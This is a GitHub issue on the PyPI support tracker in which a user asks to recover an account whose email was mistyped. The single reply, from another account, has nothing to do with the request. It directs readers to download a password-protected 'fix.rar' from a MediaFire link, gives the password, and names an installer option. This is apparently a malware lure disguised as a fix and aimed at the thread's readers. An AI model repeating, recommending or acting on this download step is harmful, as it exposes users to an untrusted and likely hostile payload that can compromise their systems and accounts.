### ISSUE TITLE
Account recovery request

### ISSUE THREAD

**Issue by focitti** [pypi/support#4638]
### PyPI Username

FAJO

### Reason for request

Incorrect email; I accidentally added and extra .com (i.e. focitt01@gmail.com.com) and can therefore not verify my account.

### Recovery Codes

- [X] I never generated or have lost access to the recovery codes for my account

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

### Acknowledgement

- [X] I understand that it may take a significant amount of time to process my account recovery request.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
